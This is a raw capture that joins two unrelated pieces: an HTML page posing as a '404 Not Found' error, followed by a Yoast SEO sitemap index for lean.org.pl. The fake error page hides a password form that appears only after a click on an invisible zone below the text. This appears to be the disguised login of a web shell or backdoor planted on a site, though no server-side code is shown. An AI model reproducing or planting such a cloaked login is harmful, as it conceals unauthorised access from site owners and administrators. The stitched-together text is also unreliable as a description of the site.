<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>404 Not Found</title>
<link rel="icon" type="image/x-icon" href="#">
<style>
body {
  margin: 0;
  background-color: #000;
  color: #999;
  font-family: Arial, sans-serif;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  height: 100vh;
  text-align: center;
}

h1 {
  font-size: 185px;
  color: #444;
  margin: 0;
}

h2 {
  font-size: 39px;
  color: #888;
  margin: 10px 0 15px;
}

p {
  color: #777;
  font-size: 19px;
  margin-bottom: 45px;
}

#trigger-zone {
  width: 100%;
  height: 35px;
  cursor: pointer;
  position: relative;
}

form {
  display: none;
  margin-top: -10px;
}

input[type="password"] {
  width: 150px;                
  padding: 4px;                
  border: none;
  background: #000;
  color: #fff;
  outline: none;
  font-size: 12px;             
  border-radius: 2px;
  text-align: center;
  box-shadow: 0 0 0 1px #ffffff13;  
  transition: all 0.3s ease-in-out;
}
input[type="password"]:focus {
  box-shadow: 0 0 4px #ffffff13;
}
</style>
</head>
<body>

<h1>404</h1>
<h2>Not Found</h2>
<p>The resource requested could not be found on this server!</p>

<div id="trigger-zone"></div>

<form method="post" id="login-form">
  <input type="password" name="password" required>
</form>

<script>
const trigger = document.getElementById('trigger-zone');
const form = document.getElementById('login-form');
let revealed = false;

trigger.addEventListener('click', () => {
  if (!revealed) {
    form.style.display = 'block';
    revealed = true;
  }
});
</script>

</body>
</html>
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//lean.org.pl/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://lean.org.pl/post-sitemap.xml</loc>
		<lastmod>2026-05-28T08:04:44+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/page-sitemap.xml</loc>
		<lastmod>2026-07-16T14:00:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/training-sitemap.xml</loc>
		<lastmod>2026-07-23T14:10:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/program-sitemap.xml</loc>
		<lastmod>2026-07-16T06:56:47+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/book-sitemap.xml</loc>
		<lastmod>2026-03-30T13:30:21+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/workshop-sitemap.xml</loc>
		<lastmod>2025-12-12T11:06:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/category-sitemap.xml</loc>
		<lastmod>2026-05-28T08:04:44+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/services-sitemap.xml</loc>
		<lastmod>2025-12-12T11:06:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://lean.org.pl/author-sitemap.xml</loc>
		<lastmod>2026-07-31T12:23:33+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->